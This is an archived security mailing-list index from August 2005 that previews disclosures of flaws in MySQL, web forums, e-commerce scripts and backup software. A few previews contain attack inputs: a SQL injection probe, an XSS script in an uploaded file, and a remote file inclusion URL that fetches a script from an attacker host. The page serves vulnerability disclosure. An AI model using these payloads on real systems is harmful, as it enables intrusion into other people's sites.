|
Colapse all |
Post message
[AppSecInc Advisory MYSQL05-V0002] Buffer Overflow in MySQL User Defined Functions 2005-08-08 Team SHATTER (shatter appsecinc com) -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Buffer Overflow in MySQL User Defined Functions AppSecInc Team SHATTER Security Advisory MYSQL05-V0002 http://www.appsecinc.com/resources/alerts/mysql/2005-002.html August 08, 2005 Risk level: LOW Credits: This vulnerability was discovered and resea [ more ] [ reply ] RE: CAID 33239 - Computer Associates BrightStor ARCserve/Enterprise Backup Agents buffer overflow vulnerability 2005-08-06 Williams, James K (James Williams ca com) On August 02, 2005, CA released patches to address a buffer overflow vulnerability in some of the BrightStor ARCserve Backup and BrightStor Enterprise Backup for Windows application agents. The patch for BrightStor ARCserve Backup r11.1 Agent for SQL for Windows (QO70767) did not fully remediate [ more ] [ reply ] iDEFENSE Security Advisory 08.05.05: EMC Navisphere Manager Directory Traversal Vulnerability 2005-08-05 iDEFENSE Labs (labs-no-reply idefense com) EMC Navisphere Manager Directory Traversal Vulnerability iDEFENSE Security Advisory 08.05.05 www.idefense.com/application/poi/display?id=288&type=vulnerabilities August 05, 2005 I. BACKGROUND EMC Navisphere storage management software is a suite of tools that enables discovery, monitoring, provi [ more ] [ reply ] Advisory 13/2005: Remote code execution in SysCP 2005-08-08 Christopher Kunz (christopher kunz hardened-php net) Re: ipb Css bug(now public) 2005-08-08 mattmecham gmail com (1 replies) E107 + IPB XSS Exploit 2005-08-08 edward11 postmaster co uk E107 + IPB XSS Exploit memo Works on e107 and IPB "maybe others like xoops not yet tested" An XSS vulnerability allowed users to inject code When posting a html attachment tested succesfully on ipb 1.0.3 all the vers should be vuln tested on e107 6.* Patch none yet, workround. disalow .html as u [ more ] [ reply ] Re: [NOBYTES.COM: #8] Naxtor Shopping Cart 1.0 - Information Disclosure & Possible SQL Injection 2005-08-08 ICool (devfreedom gmail com) Yes, it is vulnerable. The user inputs as cat_id is not quoted when retrieving the category text. You can test the vulerability by: cat_id=2%20and%201=1 cat_id=2%20and%201=2 Patrick Morris wrote: > Do you have any evidence that there is a real vulerability here, or are > you basing your assumpt [ more ] [ reply ] SQL IN Open Bulletin Board 2005-08-08 ABDUCTER_MINDS YAHOO COM Class: Input Validation Error Remote: Yes Local: Yes Credit: ABDUCTER ----> ABDUCTER_MINDS (at) YAHOO (dot) COM [email concealed] {OR} ABDUCTER_MINDS76 (at) HOTMAIL (dot) COM [email concealed] Vulnerable: Powered by Open Bulletin Board ALL VERSION ****************************************************** info :- openbb is APOPULAR FORUM HAVE MANY VERSI [ more ] [ reply ] Re: SQL IN PortailPHP 2005-08-07 Steven M. Christey (coley mitre org) >Vulnerable: PortailPHP 2.4 and all version According to the vendor web site, the most recent version of PortailPHP is 1.3, released in October 2004. Was this a typo? Other reports for SQL injection in an "id" parameter for 1.3 were publicly made by CENSORED on May 21, 2005, but those reports we [ more ] [ reply ] Gravity Board X v1.1 multiple vulnerabilities 2005-08-07 retrogod aliceposta it 4.22 07/08/2005 Gravity Board X v1.1 (possibly prior versions) Remote code execution, SQL Injection / Login Bypass, cross site scripting, path disclosure poc software: author site: http://www.gravityboardx.com/ a) Sql Injection / Login Bypass: A user can bypass login check and grant administr [ more ] [ reply ] [ GLSA 200508-05 ] Heartbeat: Insecure temporary file creation 2005-08-07 Sune Kloppenborg Jeppesen (jaervosz gentoo org) [ GLSA 200508-04 ] Netpbm: Arbitrary code execution in pstopnm 2005-08-05 Thierry Carrez (koon gentoo org) Re: On classifying attacks 2005-08-02 Thierry Carrez (koon gentoo org) Forte Systems - Iosif Peterfi wrote: > Ok, so let's split them like this: > > 1. Simple > 1.1 Remote > 1.2 Local > 2. Compound > 2.1 Social engineered > 2.2 Technical > 2.3 Local > > [...] > Does this makes sense to anyone ?! I use "Active" instead of "Simple" and "Passive" instead of [ more ] [ reply ] Root exploits in Lantonix Secure Console Server 2005-08-05 c0ntex open-security org /* ************************************************************************ ***************************************** $ An open security advisory #11 - Lantronix SCS Local Root Exploits ************************************************************************ ************************************ [ more ] [ reply ] Comdev eCommerce wce.download.php Download Vulnerability 2005-08-05 none none com Class: Input Validation Error Vulnerable: Comdev Comdev eCommerce 3.0 The wce.download.php script (present in two locations) can be passed a "download" http request parameter to download an arbitrary file on the vulnerable server. Example: http://www.vulnerable.com/oneadmin/faqsupport/wce.dow [ more ] [ reply ] Defeating Citi-Bank Virtual Keyboard Protection 2005-08-05 Debasis Mohanty (debasis hackingspirits com) Recently I discovered a method to defeat the much hyped Citi-Bank Virtual Keyboard Protection which the bank claimed that it defends the customers against malicious programs like keyloggers, Trojans and spywares etc. Find the details below - Description: Early this year, Citi-Bank introduced the [ more ] [ reply ] ipb Css bug(now public) 2005-08-05 virusishacker gmail com the css found when you uploading a file to the server by the "atteched file" function.. in ipb you can upload some HTML file,in the html file write this: <html> <body> <script>alert('Css found By V[i]RuS');</script> </body> </html> when someone will click on the attechment file the script will run. [ more ] [ reply ] tar preserves setuid bit 2005-08-04 Imran Ghory (imranghory gmail com) (essentially the same as the unzip vulnerability CAN-2005-0602 except that it only works against the root user) ================================ tar preserves setuid bit ================================ Software: tar Version: 1.15.1 Software URL: <www.gnu.org/software/tar/tar.html> Platform: Unix [ more ] [ reply ] Comdev eCommerce config.php Vulnerability 2005-08-05 none none com Class: Input Validation Error Vulnerable: Comdev Comdev eCommerce 3.0 The config.php script can be passed a "path[docroot]" http request parameter to change the location of an included file. Example: http://www.vulnerable.com/oneadmin/config.php?path[docroot]=http://www.h acker.com/badscript.p [ more ] [ reply ] |
|
Privacy Statement |
Ubuntu Security Notice USN-162-1 August 08, 2005
ekg vulnerabilities
CAN-2005-1850, CAN-2005-1851, CAN-2005-1852, CAN-2005-1916,
CAN-2005-2369, CAN-2005-2370, CAN-2005-2448
========================================================
[ more ] [ reply ]